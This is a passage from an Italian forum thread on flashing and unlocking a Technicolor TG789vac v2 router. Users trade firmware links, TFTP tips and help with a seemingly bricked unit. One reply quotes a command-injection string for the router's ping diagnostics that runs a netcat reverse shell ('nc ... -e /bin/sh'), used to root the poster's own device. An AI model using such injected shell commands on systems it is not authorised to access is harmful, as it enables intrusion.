[GUIDA] Flash, Root e Modding Technicolor TG789vac v2 (VANT-6)

• 4738 Risposte
  • 2440172 Visite

Offline nproduction

• Membro Anziano
  • 149
Re:[GUIDA] TG789vac v2 iiNET/UNO Flash, Sblocco e Modding
« Risposta #675 il: 30 Maggio 2018, 18:08 »
@Tsurugi prova a fare una prova senza filtro e prova a cambiare filtro del modem, in modo da confrontare entrambe le cose, e manda gli screen.
TIM HUB 17.3.c GUI ANSUEL/ROOT
TIM AGTOT 16.3 GUI ANSUEL/ROOT
TIM AGTOT 16.3 GUI ANSUEL/ROOT
TIM TG789vac v2 17.2 GUI ANSUEL/ROOT
FB TG789vac v2.(ex FW IAD) 17.2 GUI ANSUEL/ROOT
FASTGate (DGA4131) Forse Brikkato
FASTGate (Askey)

Offline BlackDave

• Nuovo Iscritto
  • *
  • 19
« Risposta #676 il: 31 Maggio 2018, 01:11 »
Vi ringrazio di cuore per questo forum e questo thread che mi hanno permesso di sbloccare un modem Fastweb e di poterlo quindi usare come router wifi insieme al modem/router Infostrada (uno Zyxel) che non mi soddisfaceva nella sua parte Lan/Wifi (ho entrambi perché ho fatto passaggio da Fastweb a Infostrada, e il modem Fastweb mi era stato detto che potevo tenerlo).
Grazie a questo fatto potrò risparmiare i soldi dell'acquisto di un router wifi a parte  :D :D

Solo alcune cose:
Il firmware io l'ho scaricato direttamente dal sito iiNet: https://iihelp.iinet.net.au/Upgrading_the_iiNet_TG-789_Firmware
da questo link : ftp://ftp.iinet.net.au/pub/iinet/firmware/TG789vacV2/VANT-6/
perché coi vostri link ho avuto questi problemi:
1) il primo punta a un insieme di cartelle dove io, sinceramente, non sapevo dove cercare per scaricare il firmware ...
2) il secondo link invece dovrebbe far scaricare direttamente il file (ho visto adesso che dovrebbe puntare al file nella cartella ftp su iiNET) però in realtà quelli di iiNET hanno caricato un'altra versione, aggiornata, del firmware, quindi il link non funziona e da errore "404 Not Found" (penso semplicemente perché adesso il nome del file non corrisponde più). Conviene forse mettere il link alla cartella, più che al file, per evitare di dover ogni volta aggiornare il link? (ogni volta che caricano un firmware aggiornato intendo ...).

Dopodiché per quanto riguarda la guida in Inglese linkata ho trovato alcune lacune e ho integrato con un'altra guida trovata su un blog di un italiano. Appena ho 5 minuti vi posto anche quella ed evidenzio le differenze.
(per riuscire a caricare il firmware iiNET ho dovuto prendere un po' di cose da una guida, e un po' dall'altra  :D :D )
Grazie a dio ho letto poi la vostra indicazione che la password richiesta per entrare nel modem/router col firmware iiNET è quella posta sull'etichetta sotto il modem stesso, perché, dopo aver con successo caricato il nuovo firmware nel router, mi stavo già disperando perché non sapevo che password mettere per entrare nella pagina di configurazione (che, per inciso, ha IP 10.1.1.1).

Ad ogni modo, adesso il router Techn. ha il firmware iiNET e funziona, collegato tramite cavo ETH sulla sua Wan a una porta Lan del modem Zyxel.
Peccato che non abbia una copertura wifi eccelsa secondo me. Come copertura lo Zyxel e un router Netgear che avevo provato mi sembravano molto meglio, ma con lo Zyxel mi cade sempre il segnale e ho disconnessioni (a volte le reti spariscono ...) quindi, almeno da quel punto di vista, con questo Technicolor ho risolto. Inoltre con questo Technicolor (anche col Netgear per la verità) riesco a far funzionare alcune ... "funzioni" (scusate il gioco di parole) di una stampante di rete che con lo Zyxel non ne vuole sapere (e di questo sono molto contento, era uno dei motivi principali per cui stavo considerando l'acquisto di un router wifi separato dal modem).

Una curiosità prima di concludere: il cosiddetto "sblocco" è una cosa diversa dal cambio del firmware giusto?
Voi per sblocco intendete la possibilità di usare poi il modem anche per la parte adsl/vdsl con la linea di un altro operatore, giusto?
Alla fine, se io non devo fare quello ma usarlo solo come router wifi non ho bisogno di fare anche quella procedura, ma mi posso fermare al caricamento del firmware e successiva configurazione come ho già fatto, giusto?
Comunque grazie ancora e buona giornata.
Quando posso scriverò le perplessità che riguardano la guida in Inglese linkata. Niente di grave cmq.
Bye bye

Offline Tsurugi

• Membro Giovane
  • **
  • 92
« Risposta #677 il: 31 Maggio 2018, 01:44 »
grazie a tutti dei consigli per ora lo scolapasta è tornato nella scatola..... mi viene da fare una considerazione, ok ci sono molti errori, probabilmente il cavo che va dalla centrale a casa  è sicuramente vecchio, il filtro può essere non al 100% ma mi chiedo xche sullo scolapasta va piano e sull AGPWI no !!! ...non è casuale, e non si tratta di coincidenza xche di test ne ho fatti molti e AGPWI va sempre a praticamente quasi il doppio della velocità .....nei prossimi giorni farò altri test, grazie ancora

Offline Tsurugi

• Membro Giovane
  • **
  • 92
« Risposta #678 il: 31 Maggio 2018, 01:55 »
@BlackDave provo a risponderti io ...la prima domanda riguardo il link in effetti sul primo vi è un errore e il secondo punta ad un file che non c'è più, ma se passi il mouse sul link, poi in basso (se usi chrome) ti appare il nome dell'utente/cartella ItalianGamer91 e il nome del file, a quel punto navigando nella repo e nella cartella di tale utente trovi il file e cercando lo trovi anche in altri utenti/cartelle ..... per lo sblocco oltre il flash del firmware credoche la questione riguradi poter inviare dei comandi al router tramite ssh o telnet, cosa che normalmente non si può fare .....x la guida in inglese ho avuto problemi anche io bisogna sbattersi un pò ad es: a me le versioni più recenti di tftp davano problemi, non partiva il flash ...ciao

Offline ^NiCo^

• Ex-Staff
  • Esperto
  • 1258
  • Se non và dagli un calcio e riprova.
« Risposta #679 il: 31 Maggio 2018, 02:32 »
Bravi, mi ero scordato di aggiornare quei due link dopo la migrazione, ora manda alla mia cartella sul repo dove sono presenti i fw tim, iinet e uno.uk

@Tsurugi La cosa è strana ma vedendo gli screen che hai postato con il 789 hai una quantità di errori CRC e ES anormale, a me faceva così in adsl2+ quando portavo snrm troppo a strozzo (circa 2dB o meno), si comportava esattamente come nel tuo caso.
Il perchè il preistorico modem agpwi si comporti così bene bohhhhh, a parte il fatto che non ci hai detto su che marca di dslam sei, potrebbe anche essere una combo di queste cose, compatibilità chipset dslam/modem pessima + linea messa male.

@BlackDave Si lo sblocco è una cosa diversa dal flash del firmware, prova il firmware uno.uk che ho nel mio repo, lo flashi dalla piastrella gateway (come spiega la guida per aggiornare iinet che hai linkato), è meglio di iinet ;)

Offline BlackDave

• Nuovo Iscritto
  • *
  • 19
« Risposta #680 il: 31 Maggio 2018, 10:40 »
Citazione
@BlackDave prova il firmware uno.uk che ho nel mio repo, lo flashi dalla piastrella gateway (come spiega la guida per aggiornare iinet che hai linkato), è meglio di iinet ;)

Ah si? Ok, lo proverò ma ... cosa intendi con "lo flashi dalla piastrella gateway" ?? :o :o
« Ultima modifica: 31 Maggio 2018, 10:48 da MisterFTTH »

Offline Tsurugi

• Membro Giovane
  • **
  • 92
« Risposta #681 il: 31 Maggio 2018, 12:04 »
@^NiCo^ come faccio a sapere la marca del DSLAM ? ...è qui sotto casa al massimo faccio una foto :) .....  cmq visto che stanno finendo di mettere la fibra in tutta la città, aspetto che sia attiva e quando farò il passaggio ad FTTC Telecom collegherò tutto x bene e ci risentiremo, nel frattempo dalla famosa piastrella  :rotfl: gateway rimetterò il firmware originale Tim 1.0.4 e riporrò lo scolapasta nella scatalo, in modo che se venisse il tecnico non mi scassi le  :rotfl: :rotfl:
@BlackDave la piastrella gateway è l'icona grande gateway quando apri il menu del router   :nod:
« Ultima modifica: 31 Maggio 2018, 12:09 da Tsurugi »

Offline BlackDave

• Nuovo Iscritto
  • *
  • 19
« Risposta #682 il: 31 Maggio 2018, 12:14 »
Ah, ho capito. Quindi se decido di provare il firmware uno.uk lo posso caricare dalla pagina di configurazione del router, sezione Gateway, Upgrade firmware, giusto?
Evitando quindi di fare la procedura che ho usato per caricare il firmware iiNET (col software tftp ecc), giusto?
Buono a sapersi, molto più semplice e veloce.
Stesso discorso se decido di tornare indietro per qualche motivo: posso fargli "firmware upgrade" e rimettere quello iiNET in caso si?
« Ultima modifica: 31 Maggio 2018, 13:02 da MisterFTTH »

Offline BlackDave

• Nuovo Iscritto
  • *
  • 19
« Risposta #683 il: 31 Maggio 2018, 12:18 »
Una domanda: ho notato che il Technicolor scalda molto. Quando lo usavo con Fastweb non ci avevo mai fatto caso.
E' normale? E' l'apparecchio in sé che scalda così tanto?
O può dipendere dal firmware?

Offline Tsurugi

• Membro Giovane
  • **
  • 92
« Risposta #684 il: 31 Maggio 2018, 12:27 »
@BlackDave .....................stesso discorso se decido di tornare indietro per qualche motivo: posso fargli "firmware upgrade" e rimettere quello iiNET in caso si?...

se metti un fw tipo IINET sbloccato si, se torni indietro a un FW TIM bloccato dovrai rifare la procedura x sbloccarlo e usare TFTP ....almeno credo ma aspetta conferme dall'alto  :nod:

Offline BlackDave

• Nuovo Iscritto
  • *
  • 19
« Risposta #685 il: 31 Maggio 2018, 12:33 »
Ok, grazie  ;)
p.s.: scusate le tante domande ma sono nuovo del forum e abbastanza nuovo dell'argomento, e sono inoltre contraddistinto da un'insaziabile curiosità  :P
« Ultima modifica: 31 Maggio 2018, 13:02 da MisterFTTH »

Offline Tsurugi

• Membro Giovane
  • **
  • 92
« Risposta #686 il: 01 Giugno 2018, 02:32 »
@Nico  quale è la procedura corretta x tornare al FW Tim ? ho flashato dalla "piastrella" gateway AGTOT_1.0.4_CLOSED.rbi ma sembra non flashare nulla ho fatto un refresh della pagina dopo 10 minuti ho visto che non è cambiato nulla, va fatta una procedura di reset o simile ? si può andare in modalità "flash" x usare TFTP ?

sono riuscito ad usare TFTP, ho flashato correttamente ma mi parte sempre iinet, mi serve di dare il comando switchover ? quindi devo sbloccare ?

ho provato a sbloccare ma una volta messo in ascolto netcat non riesco ad andare avanti, la guida dice di inserire il comando in diagnostic nella sezione ping, ma non c'è una sezione dove mettere la riga di comando, quindi ?

mi sono accorto avendo precedentemente flashato il firmware IINET che impostando il modem sullo stesso indirizzo si incasina la gui ..rimane il logo iinet anziche technicolor e le finestre di attesa e conferma non appaiono, x vi sualizzare il tutto correttamente ho cambiato ip del modem su un numero mai usato 192.168.1.15 anziche il classico 1 finale ...e ora funziona bene ..... rimane il fatto di dove andare ad inserire questo comando .....:::::::;nc ip computer 1337 -e /bin/sh
« Ultima modifica: 01 Giugno 2018, 12:20 da Tsurugi »

Offline BlackDave

• Nuovo Iscritto
  • *
  • 19
« Risposta #687 il: 01 Giugno 2018, 14:01 »
Si lo sblocco è una cosa diversa dal flash del firmware, prova il firmware uno.uk che ho nel mio repo, lo flashi dalla piastrella gateway (come spiega la guida per aggiornare iinet che hai linkato), è meglio di iinet ;)

Ho un problema (serio): ho provato a caricare il firmware uno.uk preso  dalla vostra cartella ma qualcosa dev'essere andato storto.
Ho provato a farlo andando nella sezione Gateway del firmware iiNET e  lì ho cliccato su Upgrade andando poi a selezionare il file precedentemente scaricato. L'upgrade è partito, ed è pure arrivato fino alla fine. Il modem si è riavviato da solo ma da quel momento in avanti sembra non funzionare più, nel senso che non riesco ad accedere alla pagina di configurazione del modem e se configuro la mia scheda ethernet perché si faccia assegnare automaticamente un indirizzo ip questo non avviene, nel senso che riceve un indirizzo ip strano, non gateway, e mi dice "rete non identificata", Nella pagina di configurazione del modem non riesco più ad entrare.
La cosa buffa è che tutte le luci del modem sono verdi come se stesse funzionando correttamente (ma quello credo perché gli sono rimaste le impostazioni ip statiche che gli avevo messo prima).
Ho letto da qualche parte la cosa dei due bank: quindi da qualche parte, dentro il modem, dovrebbe esserci un firmware funzionante, no?
C'è un modo secondo voi per recuperare l'apparecchio?
Anche se il wifi di questo technicolor mi sembra scadente. In una stanza a pochi metri dal modem mi cade la connessione e a volte si blocca la navigazione ... (per questo volevo provare il firmware uno.uk e anche perché non riuscivo a far funzionare la porta usb posta sul lato del modem/router).
Se poteste indicarmi la procedura giusta per ripristinare il modem che poi mi rifaccio il flash con tftp del firmware iiNET (o uno.uk) ve ne sarei grato.
P.s.: nelle condizioni attuali ho già provato a rifare il flash tramite tfptd32, e il caricamento del firmware è pure partito. E' arrivato alla fine, il modem si è riavviato, ma poi solita solfa: indirizzo ip senza senso (per me) e non riesco ad entrare nel modem.
Ringrazio in anticipo per l'aiuto.

Offline larsen64it

• VIP
  • 2696
« Risposta #688 il: 01 Giugno 2018, 14:17 »
Una volta caricato UNO da IINET al ravvio è normale che non ti faccia accedere alla rete o alla webgui. Bisogna resettarlo da tasto reset fino a quando  non riparte.

Offline BlackDave

• Nuovo Iscritto
  • *
  • 19
« Risposta #689 il: 01 Giugno 2018, 14:29 »
Ho già provato a tenere premuto il tasto reset fino a quando non lampeggia tutto e poi riparte, ma non pare funzionare.
Il tasto reset ripristina tutto alle impostazioni di fabbrica giusto? Se io ho caricato con successo il firmware uno dovrebbe ripristinare le impostazioni di default del firmware stesso, ma questo non sembra accadere, come ho descritto sopra.

Aggiungo un'informazione: se io controllo le reti disponibili mi compaiono le reti che avevo impostato nel firmware iiNET, col nome che io avevo dato alla rete wifi, quindi evidentemente il caricamento del firmware uno non è andato a buon fine. Se tengo premuto il tasto reset anche per 30 - 40 secondi non succede nulla.
« Ultima modifica: 01 Giugno 2018, 14:43 da MisterFTTH »